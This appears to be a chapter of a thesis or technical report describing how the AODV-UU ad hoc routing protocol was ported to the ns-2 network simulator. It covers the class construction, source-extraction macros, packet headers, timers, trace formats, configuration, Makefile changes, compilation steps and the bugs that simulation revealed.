We have a new database connection and all our MXDs have to be updated. I ran a script to update the layers on a bunch of MXDs. Then I opened a map, right clicked a layer, properties, then checked under the source tab to see if the changes took place. But, the layer was still referencing the old connection. Is there a snippet I could include in this script, or something else, that verifies that the layers have indeed been updated? There is a print statement in the script, but that just prints the name of the MXD. It doesn't really give concrete proof. import arcpy import os def find_and_replace(MXD_workspace, oldPath, newPath): arcpy.env.workspace = MXD_workspace path = arcpy.env.workspace for root, dirs, files in os.walk(path): for name in files: if name.endswith(".mxd"): mxd_name = name fullpath = os.path.join(root,name) print mxd_name print fullpath mxd = arcpy.mapping.MapDocument(fullpath) for df in arcpy.mapping.ListDataFrames(mxd): for flayer in arcpy.mapping.ListLayers(mxd, "*", df): if flayer.isFeatureLayer or flayer.isRasterLayer: try: mxd.findAndReplaceWorkspacePaths(oldPath, newPath, False) print "Repaired the path for " + name except: print(mxd_name + " cannot replace paths") mxd.save() del mxd print "complete..." if __name__ == '__main__': find_and_replace(r"\\gisfile\GISmaps\AtlasMaps\ATLAS_MAPS_18\CountyBoard", r"Database Connections\BonnScott.sde", r"Database Connections\gisEddy.gissql.sde") #(path2MXDs, path2oldGDB, path2newGDB) didn't the other print statements produce anything? (ie line 21, 23
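For concrete proof, a quick read-only pass over the same MXDs can report where every layer points after the update. This is just a sketch — the "BonnScott" fragment below is taken from the old connection name in your script, so adjust it to whatever string only the old connection contains:

import arcpy, os

def report_workspace_paths(mxd_folder, old_fragment="BonnScott"):
    # Re-open each MXD and print every layer's workspace path so you can
    # see at a glance whether anything still references the old connection.
    for root, dirs, files in os.walk(mxd_folder):
        for name in files:
            if not name.endswith(".mxd"):
                continue
            mxd = arcpy.mapping.MapDocument(os.path.join(root, name))
            for df in arcpy.mapping.ListDataFrames(mxd):
                for lyr in arcpy.mapping.ListLayers(mxd, "*", df):
                    if lyr.supports("WORKSPACEPATH"):
                        status = "STILL OLD" if old_fragment in lyr.workspacePath else "ok"
                        print("{} | {} | {} | {}".format(name, lyr.name, lyr.workspacePath, status))
            del mxd

report_workspace_paths(r"\\gisfile\GISmaps\AtlasMaps\ATLAS_MAPS_18\CountyBoard")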
https://community.esri.com/thread/216503-verify-mxdfindandreplaceworkspacepaths
CC-MAIN-2018-34
refinedweb
236
54.9
This is the second part of story about using functional programming for prototyping (first part is Here). Originally, my intention was to document whole process of prototyping. I wished not to finish prototype and then describe it after, but to show every step in my work-flow. However, soon after I started coding, I forgot about documenting each step, and after few hours my prototype was complete. All javascript files are successfully imported in less than a second (average 626.3ms in 10 imports). After importing ten times all files Leo is still responsive. It still remains to clean and document my prototype. All that I can now say about prototyping process is that it was a pleasant and easy activity. While developing it I needed to look few times in the Python documentation about re, bisect, timeit, … Prototype Indexing source file After initial idea to split source in lines and operate on lines one by one, I ended up with manual splitting, function named so as opposed to using splitlines method. However, now I think a better name for this function would be create_source_index or something similar. def manual_splitting(src=None): src = src or get_source() chunks = [] start = -1 end = len(src) pat = re.compile('[\'"]|/\\*|//') @others dd = { '"' : lambda i: do_string(i, '"'), "'" : lambda i: do_string(i, "'"), '//': do_comment_sl, '/*': do_comment_ml, } while start < end: m = pat.search(src, start + 1) if m: start = do_code(m.start()) start = dd[m.group(0)](start) else: start = do_code(end) return (src, tuple(chunks)) test(manual_splitting, number=100) and in Log pane result: average 13.2 ms This function makes an index of source file chunks of three different types: - code - string - comment it returns an array of tuples (chunk_type, start_index, end_index). At first I considered chunks to be single line, but later it become clear that it is better to allow for multiline chunks. Helper functions defined inside this function are very simple: def do_code(i): if i > 0 and i > start + 1: chunks.append(('code', start, i)) return i def do_string(i, q): while True: i = src.find(q, i + 1) if i > -1 and src[i - 1] != '\\': break if i < 0: chunks.append(('string', start, end)) return end chunks.append(('string', start, i + 1)) return i + 1 def do_comment_sl(i): i = src.find('\n', i + 2) if i < 0: i = end while i + 1 < end and src[i + 1] == '\n': i += 1 chunks.append(('comment', start, i)) return i def do_comment_ml(i): i = src.find('*/', i + 2) + 1 if i < 1: i = end while i + 1 < end and src[i + 1] == '\n': i += 1 chunks.append(('comment', start, i)) return i As you can see they are very similar, and I really just copy/pasted them adjusting each a bit. That may be considered violation of DRY principle, but it is very localized (all of them reside inside one function). Main argument of DRY principle is that later if you change one part of duplicated code, there is a possibility that you will forget to change the other parts of code. But, since all this repeated code parts are very close to each other, DRY principle violation becomes less danger. Source file is searched with regex pattern that catches beginning of: - single line comment - multi line comment - single quote string - double quote string Searching starts in code mode, and for each beginning of another chunk type, helper function of that type is called with the starting index as first argument. Every helper function returns the end of chunk and appends chunk to chunks array. 
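The test helper used above is not part of the listing; a minimal sketch of what it might look like, based on timeit (this is an assumption about how the timing was done, not the actual harness — g is Leo's predefined scripting global, and g.es writes to the Log pane):

import timeit

def test(fn, number=100):
    # Call fn `number` times and report the average run time in milliseconds
    # to Leo's Log pane.
    total = timeit.timeit(fn, number=number)
    g.es('average %.1f ms' % (1000.0 * total / number))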
Searching for chunks After indexing source file we need a function that finds chunk for any given position in source file. I was thinking to use bisect from standard library, but it turned out that it was faster to re-implement it than to figure out how to adjust chunks array to comply to bisect rules. Now, that I write this, I realize that it could be achieved very easily, the only thing that is needed is to change the order of tuple items from (type, start, end) to (start, end, type). And to use bisect functions not on integer position, but on tuple created from the integer argument of this function. But, that may be left for the polishing phase. def find_chunk(i, chunks, low=0): isFound = lambda m: chunks[m][1] <= i and chunks[m][2] > i if isFound(low): return low upp = len(chunks) - 1 while upp > low: med = (upp + low) // 2 k, a, b = chunks[med] if isFound(med): return med if i < chunks[med][1]: upp = med - 1 else: low = med + 1 return upp if isFound(upp) else -1 # and here is a specialized version that finds nearest code chunk # after given index def find_code_chunk(i, chunks, low=0): j = find_chunk(i, chunks, low) if j < 0: return j nchunks = len(chunks) - 1 while chunks[j][0] != 'code': j += 1 if j > nchunks: return -1 return j Searching for functions Now, that we have functions to locate chunks, we can pursue our next target: finding structural blocks of source code. In javascript syntax parenthesis '()', '[]', '{}' must be properly nested. There may exists some of this characters in comment and string chunks, but they don’t count. The only ones that matter are those in code blocks. That was the reason for chunking source code in the first place. def find_next_block(i, src, chunks): # searching for the opening character pat = re.compile(r'\(|\{|\[') end = len(src) j = find_code_chunk(i, chunks) if j < 0: return i, end c_chunks = lambda:(x for x in chunks[j:] if x[0] == 'code') for k, a, b in c_chunks(): m = pat.search(src, i) if m: break else: return i, end opening_ch = m.group(0) closing_ch = {'{': '}', '[': ']', '(': ')'}[opening_ch] lev = 1 ii = m.end() for k, a, b in c_chunks(): while ii < b: if src[ii] == opening_ch: lev += 1 elif src[ii] == closing_ch: lev -= 1 ii += 1 if lev: continue return m.start(), ii return m.start(), end First we are searching for the opening character (one of '(', '[', '{'). If there is no block openings, that means we are finished. Last block will be in that case form given position to the end of file. If we find the opening character, then we continue searching from the character following opening one, counting levels as we encounter them, skiping all non code blocks. When we find closing character that resets lev to zero, we have the end index and so we return starting and ending index of the code block. There are several ways to define function in javascript. There are so called named functions in the form: But there are also anonymous functions and function expressions, which doesn’t have a name, but are assigned to a variable or passed as an argument to some other function. What is common to both cases is that they contain keyword 'function', followed by a single parenthesized block of arguments, followed by a function body which is block that starts with ‘{’ and ends with ‘}’. To find all function definitions we need to search all code blocks for a 'function' word. Whenever we find one, skip next block of arguments. The very next block contains body of function definition. End of this block is the end of function definition. 
def find_next_function(i): pat = re.compile(r'\bfunction\b') m = pat.search(src, i) if m: ii = m.end() a, b = find_next_block(ii, src, chunks) a, b = find_next_block(b, src, chunks) yield m.start(), b Begining can be either start of keyword function that we already have found, but may also be somewhere before. Especially if the definition is following after comment chunk. Also, if it is function expression then it is often followed by semicolon. Finally, it would be useful to have not only start and end index yielded, but headline for the node as well. It would be natural to continue search right after the end of found block. Here is a get_all_functions definition: def get_all_functions(src, chunks): pat = re.compile(r'\bfunction\b([^(]*)\(') pat2 = re.compile(r'\bObject.definePropert(?:y|ies)\s*\(([^.]+)(?:[.]prototype)?\s*,[^{]*\{') end = len(src) @others i = 0 m1 = m2 = None m1 = pat.search(src, i) m2 = pat2.search(src, i) m1, m2, m = mi(i) for j, x in enumerate(chunks): k, a, b = x if k != 'code' or i > b: continue while m: i = start_of_func(m, j) ii = m.end() + 1 if m is m1 else m.end() - 1 a1, b1 = find_next_block(ii, src, chunks) if m is m2: b2 = src.find(')', b1) if b2 > 0: b1 = b2 + 1 b1 = eat_ch(b1, ';') b1 = eat_ch(b1, '\n') yield headline_for_f(m, src), i, b1 i = b1 + 1 m1, m2, m = mi(i) if not m or m.start() > b: break There is more in this function. I have discovered two more use cases of the code blocks that should naturally be in separate nodes. One is a call to Object.defineProperty, and the other is Object.defineProperties. I have realized that they would be best put in separate nodes after trying to import files with the previous version of the function. In its final version displayed above, two different regex patterns are used. When we search source with one and the other, we can have no match at all, a single match, or two matches. Patterns are designed to return possible function name in first group. Here is a helper function that takes both match results and return tuple of three matches. The third one is the nearest match that is next to be processed. def mi(i): _m1 = pat.search(src, i) if m1 and m1.end() < i else m1 _m2 = pat2.search(src, i) if m2 and m2.end() < i else m2 if not _m1: m = _m2 elif not _m2: m = _m1 else: m = _m1 if _m1.start() < _m2.start() else _m2 return _m1, _m2, m When search has been passed after any of matches, m.end() < i, we search further for the corresponding pattern. If any of matches is None, this function would return the other match. If both of patterns did match, function returns nearest one. Pay attention to this pattern. Helper function that are defined inside a function can access variables in outer functon scope, but they can’t change them. As a consequence, local variables in the toplevel function need not to be passed to helper functions, because they are directly visible in inner scope. However, if helper function needs to change outer variable the only way is to return its new value, and let the outer function to change variables. This is very powerful pattern! Here are few more helper functions: # advances index if next character matches eat_ch = lambda i, ch: i + 1 if i < end and src[i] == ch else i # searches backward for line break def prev_nl(i): while i > 0 and src[i] != '\n': i -= 1 return i # searches backword for the start of function definition that should be # in a single vnode. 
def start_of_func(m, j): i = m.start(0) i = prev_nl(i) j = find_chunk(i, chunks, j) return prev_non_empty_code(i, j) # helper function that searches backward from given position for the # previous non empty code chunk def prev_non_empty_code(i, cn): while cn >= 0: k, a, b = chunks[cn] if k == 'string': i = b + 1 break if k == 'comment': cn -= 1 i = a - 1 continue while i - 1 >= a and src[i - 1].isspace(): i -= 1 if i > a: break cn -= 1 return max(0, i) # helper function that tries to guess best headline for this node def headline_for_f(m, src): if m.group(0).startswith('Object.defineProperty'): s = m.group(0) i = max(s.find('"'), s.find("'")) if i > -1: s = s[i + 1:s.find(s[i], i + 1)] return m.group(1).split(',',1)[0] + ':' + s if m.group(1) else s fnm = m.group(1).strip() isQ = lambda x: src[x] in ('"', "'") if not fnm: j = prev_ch(m.start(), src) if src[j] in ('=', ':'): j = prev_ch(j, src) k = prev_ws(j, src) + 1 if isQ(j): j -= 1 if isQ(k): k += 1 fnm = src[k: j + 1] return fnm.replace('.prototype.', ':') Building outline Now, that we have a generator that extracts function definitions from source code, we can build outline tree from extracted regions. def import_file(_v0, fname): # adding top node root of this file h = g.os_path_basename(fname) v0 = insV(_v0, h, '@others\n') src = open(fname, 'rt').read() src, chunks = manual_splitting(src) # we need access to current and subsequent function block # that is why we zip generator with itself advanced one step funcs = zip_with_next(get_all_functions(src, chunks)) # little bit of cleaning headlines and finding common parts # for creating organizer nodes. All continual nodes that # has headline with the same beginning are in one organizer node pat = re.compile('[^.:]+') h1 = '' i = 0 for fcur, fnxt in funcs: h, i, j = fcur m = pat.search(h) if m: _h1 = m.group(0) else: _h1 = h b = src[i:fnxt[1]] if fnxt else src[i:] if _h1 != h1: v = insV(v0, _h1, '') h1 = _h1 # still didn't figure out why is this necessary but it is if b.startswith('\n\n'): b = b[2:] insV(v, h, b) else: if i == 0: v0._bodyString = src And as always there are few helper functions: def zip_with_next(it): prev = nxt = None for nxt in it: if prev: yield prev, nxt prev = nxt if nxt: yield nxt, None # and a factory for vnodes def insV(v0, h, b): v = leoNodes.VNode(context=c) v._headString = h v._bodyString = b v0.children.append(v) v.parents.append(v0) return v And final profiling test of the very same file rpg_objects.js that Leo with its current implementation of c.importCommands, was struggling for more than 30s, gave the following results: 10 calls, average time 233.1 ms Isn’t it success? Let alone fact that files were imported in far better form than the original Leo import gives.
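As a quick aside on the helpers above: the pairing behaviour of zip_with_next is easiest to see on a toy input (illustrative only, not part of the prototype):

list(zip_with_next([1, 2, 3]))
# [(1, 2), (2, 3), (3, None)]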
https://computingart.net/fpfproto-2.html
CC-MAIN-2021-49
refinedweb
2,324
72.66
David S. Miller writes:
> From: Alan Cox <alan@cymru.net>
> Date: Mon, 20 May 1996 09:56:18 +0100 (BST)
>
> > - isnt it mmap that should be used to implement zero-copy
>
> The net code folds copy and checksum so the user->kernel copy is very close
> to free (it is free for most people unless there is a lot of bus activity)
>
>(Those who don't feel like having a quick lesson in Sparc assembly
>optimization skip to end to see why this is so relevant anyways.)
>
>It is more than free on the Sparc I have found with 1000 hit/sec
>detailed to the instruction profiling information sampled during a 2gb
>TCP transfer. In cases where the memcpy() code would completely stall
>(and thus clear out the entire pipeline) the csum/copy code is filling
>the stalls in with "useful" work, this is especially true with chips
>which lack a store buffer or worse lack write-allocate on the cache.

You're looking at this the wrong way. It is *always* necessary to compute the checksum. We are trying to decide whether it would be a win to avoid the copy. So the question is whether we can fold the copy into the checksum without degrading the speed of the checksum and not vice-versa. I tested the speed of csum_partial() vs. csum_partial_copy() and csum_partial_copy_fromuser() on my systems with the included program and got the following results (smaller number means faster):

                          486/66DX2    Pentium 120MHz overdrive
1) csum_partial:             342            89
2) c_p_copy:                1018          1310
3) c_p_c_fromuser           1021          1317
4) memcpy:                   978          1309
5) memcpy + c_p(dst):       2109          1783
6) memcpy + c_p(src):       2110          1394
7) c_p(src) + memcpy:       2105          1398

(Yes, my Pentium system sucks rocks on writes. Also, it beats the hell out of me why the times for rows 1 and 4 add up to much less than the time for row 5 on the Pentium and rows 5-7 on the 486).

csum+copy is about the same speed as memcpy, so we are getting the csum (nearly) for free. But csum_partial() copy is much faster than the copy+csum functions, so avoiding the copy still looks like a win.

Tom.

/* gcc -O2 -fomit-frame-pointer -o spud spud.c */
#include <sys/times.h>
#include <asm/checksum.h>
#include "checksum.c" /* arch/i386/lib/checksum.c with #includes removed */

#define SIZE 1024

struct {
    long src[1024][SIZE/4];
    long fill[100];
    long dst[1024][SIZE/4];
} S;

#define SRC(n) ((char *)&S.src[(n)&1023])
#define DST(n) ((char *)&S.src[(n)&1023])

void
main ()
{
    struct tms start, stop;
    int i;

    times (&start);
    for (i = 0; i < 300000; i++) {
#if 0
        csum_partial (DST(i), SIZE, 0);
#elif 0
        csum_partial_copy (SRC(i), DST(i), SIZE, 0);
#elif 0
        csum_partial_copy_fromuser (SRC(i), DST(i), SIZE, 0);
#elif 0
        memcpy (DST(i), SRC(i), SIZE);
#elif 0
        memcpy (DST(i), SRC(i), SIZE);
        csum_partial (DST(i), SIZE, 0);
#elif 0
        memcpy (DST(i), SRC(i), SIZE);
        csum_partial (SRC(i), SIZE, 0);
#else
        csum_partial (SRC(i), SIZE, 0);
        memcpy (DST(i), SRC(i), SIZE);
#endif
    }
    times (&stop);
    printf ("%d\n", stop.tms_utime - start.tms_utime);
}
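To make the "folding" idea concrete, here is a toy sketch (not the kernel's actual csum_partial_copy implementation) of how a copy loop can accumulate a ones'-complement checksum as it goes, so the adds ride along with the loads and stores instead of needing a second pass over the buffer:

#include <stddef.h>
#include <stdint.h>

/* Illustrative only: copy 16-bit words and fold the checksum
 * into the same loop. */
static uint32_t copy_and_csum(uint16_t *dst, const uint16_t *src,
                              size_t nwords, uint32_t sum)
{
    size_t i;
    for (i = 0; i < nwords; i++) {
        uint16_t w = src[i];   /* load once             */
        dst[i] = w;            /* store it              */
        sum += w;              /* and add it to the sum */
    }
    while (sum >> 16)          /* fold carries back in  */
        sum = (sum & 0xffff) + (sum >> 16);
    return sum;
}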
https://lkml.org/lkml/1996/5/27/110
CC-MAIN-2021-31
refinedweb
506
56.49
Name | Synopsis | Description | Return Values | Errors | Usage | Examples | Attributes | See Also #include <search.h> a datum to be accessed or stored. If there is a datum in the tree equal to *key (the value pointed to by key), a pointer to this found datum is returned. Otherwise, *key is inserted, and a pointer to it returned. Only pointers are copied, so the calling routine must store the data.. tdelete() returns a pointer to the parent of the deleted node, or a null pointer if the node is not found. The twalk() function traverses a binary search tree. The root argument is the root of the tree to be traversed. (Any node in a tree may be used as the root for a walk below that node.) action is the name of a routine to be invoked at each node. This routine is, in turn, called with three arguments. The first argument is the address of the node being visited. The second argument is a value from an enumeration data type typedef enum { preorder, postorder, endorder, leaf } VISIT; (defined in <search to visiting a node before any of its children, after its left child and before its right, and after both its children. The alternate nomen), standards(5) Name | Synopsis | Description | Return Values | Errors | Usage | Examples | Attributes | See Also
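As a usage sketch (this example is not part of the original manual page), the following program builds a small tree of integers with tsearch() and prints them in ascending order with twalk(); note that the action routine receives the address of a tree node and must dereference it once to reach the stored pointer:

#include <stdio.h>
#include <stdlib.h>
#include <search.h>

static int cmp_int(const void *a, const void *b)
{
    int x = *(const int *)a;
    int y = *(const int *)b;
    return (x > y) - (x < y);
}

static void print_node(const void *nodep, VISIT which, int depth)
{
    (void)depth;
    /* print internal nodes on their second visit and leaves once,
       which yields an in-order (sorted) traversal */
    if (which == postorder || which == leaf)
        printf("%d\n", **(int **)nodep);
}

int main(void)
{
    int values[] = { 5, 1, 9, 3 };
    void *root = NULL;
    size_t i;

    for (i = 0; i < sizeof values / sizeof values[0]; i++)
        if (tsearch(&values[i], &root, cmp_int) == NULL)
            return EXIT_FAILURE;      /* out of memory */

    twalk(root, print_node);          /* prints 1 3 5 9, one per line */
    return EXIT_SUCCESS;
}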
http://docs.oracle.com/cd/E19082-01/819-2243/6n4i099nv/index.html
CC-MAIN-2014-10
refinedweb
218
72.76
This is probably my lack of knowledge of Python, but how do I set up legend labels for some bar plots that have been produced inside a function? For example, the following nicely plots my bars, but the legend doesn't know about the colours used, so it just uses black for both labels here. I'd like the labels to have the same colour as the bars generated inside plotb. (I am using a function here because my real code has extra stuff to calculate error bars and suchlike for each data set.)

x = arange(0, 5)
y = array([1.2, 3.4, 5.4, 2.3, 1.0])
z = array([2.2, 0.7, 0.4, 1.3, 1.2])

def plotb(x, y, col):
    p = bar(x, y, color=col)

plotb(x, y, 'k')
plotb(x + 0.4, z, 'y')
legend(('YYY', 'ZZZ'))

I tried passing the object "p" through the plotb argument list, but Python didn't like that. (I am just learning Python, and so far haven't seen how to pass such objects around.)

Thanks for any tips,
Dave
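One common way to handle this (a sketch of the general idea, not necessarily the only way) is to have the plotting function return the container that bar() gives back, and then pass one patch from each container to legend() as an explicit handle:

import numpy as np
import matplotlib.pyplot as plt

x = np.arange(0, 5)
y = np.array([1.2, 3.4, 5.4, 2.3, 1.0])
z = np.array([2.2, 0.7, 0.4, 1.3, 1.2])

def plotb(x, y, col):
    # return the BarContainer so the caller can build the legend from it
    return plt.bar(x, y, color=col)

p1 = plotb(x, y, 'k')
p2 = plotb(x + 0.4, z, 'y')
plt.legend((p1[0], p2[0]), ('YYY', 'ZZZ'))  # one patch per group as legend handle
plt.show()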
https://discourse.matplotlib.org/t/legend-labels-interaction-with-functions/9107
CC-MAIN-2022-21
refinedweb
186
82.04
Python solution

import heapq

class Solution(object):
    def topKFrequent(self, words, k):
        """
        :type words: List[str]
        :type k: int
        :rtype: List[str]
        """
        max_heap_freq = list()
        hashtable = dict()
        # count the frequency of every word
        for word in words:
            # equivalent shortcut: hashtable[word] = hashtable.get(word, 0) + 1
            if hashtable.get(word, None) is None:
                hashtable[word] = 1
            else:
                hashtable[word] += 1
        # push every (word, freq) pair onto the max-heap, keyed by negated frequency
        for word, freq in hashtable.items():
            heapq.heappush(max_heap_freq, (-freq, word))
        # words that share a frequency are drained through a min-heap
        # so that ties come out in ascending alphabetical order
        min_heap_word = []
        result = []
        for ki in range(k):
            if len(min_heap_word) > 0 and min_heap_word[0][1] != max_heap_freq[0][0]:
                while len(min_heap_word) > 0:
                    result.append(heapq.heappop(min_heap_word)[0])
            freq, word = heapq.heappop(max_heap_freq)
            heapq.heappush(min_heap_word, (word, freq))
        while len(min_heap_word) > 0:
            result.append(heapq.heappop(min_heap_word)[0])
        return result
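A quick sanity check with the classic example from the problem statement (assuming the class above is in scope):

words = ["i", "love", "leetcode", "i", "love", "coding"]
print(Solution().topKFrequent(words, 2))  # ['i', 'love']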
https://discuss.leetcode.com/topic/107070/python-solution
CC-MAIN-2017-47
refinedweb
158
55.95
Overhyped or necessity? Learn everything about dark mode and how to support it to the benefit of your users! (Originally published on.) Introduction 📚 I have done a lot of background research on the history and theory of dark mode, if you are only interested in working with dark mode, feel free to skip the introduction. Dark mode before Dark Mode We have gone full circle with dark mode. In the dawn of personal computing, dark mode wasn’t a matter of choice, but a matter of fact: Monochrome CRT computer monitors worked by firing electron beams on a phosphorescent screen and the phosphor used in early CRTs was green. Because text was displayed in green and the rest of the screen was black, these models were often referred to as green screens. The subsequently introduced Color CRTs displayed multiple colors through the use of red, green, and blue phosphors. They created white by activating all three phosphors simultaneously. With the advent of more sophisticated WYSIWYG desktop publishing, the idea of making the virtual document resemble a physical sheet of paper became popular. This is where dark-on-white as a design trend started, and this trend was carried over to the early document-based web. The first ever browser, WorldWideWeb (remember, CSS wasn’t even invented yet), displayed webpages this way. Fun fact: the second ever browser, Line Mode Browser — a terminal-based browser — was green on dark. These days, web pages and web apps are typically designed with dark text on a light background, a baseline assumption that is also hard-coded in user agent stylesheets, including Chrome’s. The days of CRTs are long over. Content consumption and creation has shifted to mobile devices that use backlit LCD or energy-saving AMOLED screens. Smaller and more transportable computers, tablets, and smartphones led to new usage patterns. Leisure tasks like web browsing, coding for fun, and high-end gaming frequently happen after-hours in dim environments. People even enjoy their devices in their beds at night-time. The more people use their devices in the dark, the more the idea of going back to the roots of light-on-dark becomes popular. Why dark mode Dark mode for aesthetic reasons When people get asked why they like or want dark mode, the most popular response is that “it’s easier on the eyes,”_followed by _“it’s elegant and beautiful.” Apple in their Dark Mode developer documentation explicitly writes: “The choice of whether to enable a light or dark appearance is an aesthetic one for most users, and might not relate to ambient lighting conditions.” 👩🔬 Read up more on user research regarding why people want dark mode and how they use it. Dark mode as an accessibility tool There are also people who actually need dark mode and use it as another accessibility tool, for example, users with low vision. The earliest occurrence of such an accessibility tool I could find is System7’s CloseView feature, which had a toggle for Black on White and White on Black. While System 7 supported color, the default user interface was still black-and-white. These inversion-based implementations demonstrated their weaknesses once color was introduced. User research by Szpiro et al. on how people with low vision access computing devices showed that all interviewed users disliked inverted images, but that many preferred light text on a dark background. 
Apple accommodates for this user preference with a feature called Smart Invert, which reverses the colors on the display, except for images, media, and some apps that use dark color styles. A special form of low vision is Computer Vision Syndrome, also known as Digital Eye Strain, which is defined as “the combination of eye and vision problems associated with the use of computers (including desktop, laptop, and tablets) and other electronic displays (e.g. smartphones and electronic reading devices).” It has been proposed that the use of electronic devices by adolescents, particularly at night time, leads to an increased risk of shorter sleep duration, longer sleep-onset latency, and increased sleep deficiency. Additionally, exposure to blue light has been widely reported to be involved in the regulation of circadian rhythm and the sleep cycle, and irregular light environments may lead to sleep deprivation, possibly affecting mood and task performance, according to research by Rosenfield. To limit these negative effects, reducing blue light by adjusting the display color temperature through features like iOS’ Night Shift or Android’s Night Light can help, as well as avoiding bright lights or irregular lights in general through dark themes or dark modes. Dark mode power savings on AMOLED screens Finally, dark mode is known to save a lot of energy on AMOLED screens. Android case studies that focused on popular Google apps like YouTube have shown that the power savings can be up to 60%. The video below has more details on these case studies and the power savings per app. Activating dark mode in the operating system Now that I have covered the background of why dark mode is such a big deal for many users, let’s review how you can support it. Operating systems that support a dark mode or dark theme typically have an option to activate it somewhere in the settings. On macOS X, it’s in the system preference’s General section and called Appearance (screenshot), and on Windows 10, it’s in the Colors section and called Choose your color (screenshot). For Android Q, you can find it under Display as a Dark Theme toggle switch (screenshot), and on iOS 13, you can change the Appearance in the Display & Brightness section of the settings (screenshot). The prefers-color-scheme media query One last bit of theory before I get going. 5 introduces so-called user preference media features, that is, a way for sites to detect the user's preferred way to display content. ☝️ An established user preference media feature is prefers-reduced-motion that lets you detect the desire for less motion on a page. I have written aboutprefers-reduced-motion before. The prefers-color-scheme media feature is used to detect if the user has requested the page to use a light or dark color theme. It works with the following). Supporting dark mode Finding out if dark mode is supported by the browser As dark mode is reported through a media query, you can easily check if the current browser supports dark mode by checking if the media query prefers-color-schemematches at all. Note how I don't include any value, but purely check if the media query alone matches. if (window.matchMedia('(prefers-color-scheme)').media !== 'not all') { console.log('🎉 Dark mode is supported'); } At the time of writing, prefers-color-scheme is supported on both desktop and mobile (where available) by Chrome and Edge as of version 76, Firefox as of version 67, and Safari as of version 12.1 on macOS and as of version 13 on iOS. 
For all other browsers, you can check the Can I use support tables. There is a custom element <dark-mode-toggle>available that adds dark mode support to older browsers. I write about it further down in this article. Dark mode in practice Let’s finally see how supporting dark mode looks like in practice. Just like with the Highlander, with dark mode there can be only one: dark or light, but never both! Why do I mention this? Because this fact should have an impact on the loading strategy. Please don’t force users to download CSS in the critical rendering path that is for a mode they don’t currently use. To optimize load speed, I have therefore split my CSS for the example app that shows the following recommendations in practice into three parts in order to defer non-critical CSS: style.cssthat contains generic rules that are used universally on the site. dark.cssthat contains only the rules needed for dark mode. light.cssthat contains only the rules needed for light mode. The two latter ones, light.css and dark.css, are loaded conditionally with a <link media> query. Initially, not all browsers will supportprefers-color-scheme(detectable using the pattern above), which I deal with dynamically by loading the default light.css file via a conditionally inserted <link rel="stylesheet"> element in a minuscule inline script (light is an arbitrary choice, I could also have made dark the default fallback experience). To avoid a flash of unstyled content, I hide the content of the page until light.css has loaded. <script> // If `prefers-color-scheme` is not supported, fall back to light mode. // In this case, light.css will be downloaded with `highest` priority. if (window.matchMedia('(prefers-color-scheme)'): no-preference), (prefers-color-scheme: light)"> <!-- The main stylesheet --> <link rel="stylesheet" href="/style.css"> Stylesheet architecture I make maximum use of CSS variables, this allows my generic style.css to be, well, generic, and all the light or dark mode customization happens in the two other files dark.css and light.css. Below you can see an excerpt of the actual styles, but it should suffice to convey the overall idea. I declare two variables, --color and --background-color that essentially create a dark-on-light and a light-on-dark baseline theme. /* light.css: 👉 dark-on-light */ :root { --color: rgb(5, 5, 5); --background-color: rgb(250, 250, 250); } /* dark.css: 👉 light-on-dark */ :root { --color: rgb(250, 250, 250); --background-color: rgb(5, 5, 5); } In my style.css, I then use these variables in the body { … } rule. As they are defined on the :root CSS pseudo-class—a selector that in HTML represents the <html> element and is identical to the selector html, except that its specificity is higher—they cascade down, which serves me for declaring global CSS variables. /* style.css */ :root { color-scheme: light dark; } body { color: var(--color); background-color: var(--background-color); } In the code sample above, you will probably have noticed a property color-scheme with the space-separated value light dark. Warning: The color-scheme property is still in development and it might not work as advertised, full support in Chrome will come later this year. This tells the browser which color themes my app supports and allows it to activate special variants of the user agent stylesheet, which is useful to, for example, let the browser render form fields with a dark background and light text, adjust the scrollbars, or to enable a theme-aware highlight color. 
The exact details of color-scheme are specified in CSS Color Adjustment Module Level 1. 🌒 Read up more on what color-schemeactually does. Everything else is then just a matter of defining CSS variables for things that matter on my site. Semantically organizing styles helps a lot when working with dark mode. For example, rather than --highlight-yellow, consider calling the variable --accent-color, as "yellow" may actually not be yellow in dark mode or vice versa. Below is an example of some more variables that I use in my example. /* dark.css */ :root { --color: rgb(250, 250, 250); --background-color: rgb(5, 5, 5); --link-color: rgb(0, 188, 212); --main-headline-color: rgb(233, 30, 99); --accent-background-color: rgb(0, 188, 212); --accent-color: rgb(5, 5, 5); } /* light.css */ :root { --color: rgb(5, 5, 5); --background-color: rgb(250, 250, 250); --link-color: rgb(0, 0, 238); --main-headline-color: rgb(0, 0, 192); --accent-background-color: rgb(0, 0, 238); --accent-color: rgb(250, 250, 250); } Full example In the following Glitch embed, you can see the complete example that puts the concepts from above into practice. Try toggling dark mode in your particular operating system’s settings and see how the page reacts. When you play with this example, you can see why I load my dark.css and light.css via media queries. Try toggling dark mode and reload the page: the particular currently non-matching stylesheets are still loaded, but with the lowest priority, so that they never compete with resources that are needed by the site right now. 😲 Read up more on why browsers download stylesheets with non-matching media queries. Reacting on dark mode changes Like any other media query change, dark mode changes can be subscribed to via JavaScript. You can use this to, for example, dynamically change the favicon of a page or change the <meta name="theme-color"> that determines the color of the URL bar in Chrome. The full example above shows this in action, in order to see the theme color and favicon changes, open the demo in a separate tab. const darkModeMediaQuery = window.matchMedia('(prefers-color-scheme: dark)'); darkModeMediaQuery.addListener((e) => { const darkModeOn = e.matches; console.log(`Dark mode is ${darkModeOn ? '🌒 on' : '☀️ off'}.`); }); Dark mode best practices Avoid pure white A small detail you may have noticed is that I don’t use pure white. Instead, to prevent glowing and bleeding against the surrounding dark content, I choose a slightly darker white. Something like rgb(250, 250, 250) works well. Re-colorize and darken photographic images If you compare the two screenshots below, you will notice that not only the core theme has changed from dark-on-light to light-on-dark, but that also the hero image looks slightly different. My user research has shown that the majority of the surveyed people prefer slightly less vibrant and brilliant images when dark mode is active. I refer to this as re-colorization. Re-colorization can be achieved through a CSS filter on my images. I use a CSS selector that matches all images that don’t have .svg in their URL, the idea being that I can give vector graphics (icons) a different re-colorization treatment than my images (photos), more about this in the next paragraph. Note how I again use a CSS variable, so I can later on flexibly change my filter. 🎨 Read up more on user research regarding re-colorization preferences with dark mode. 
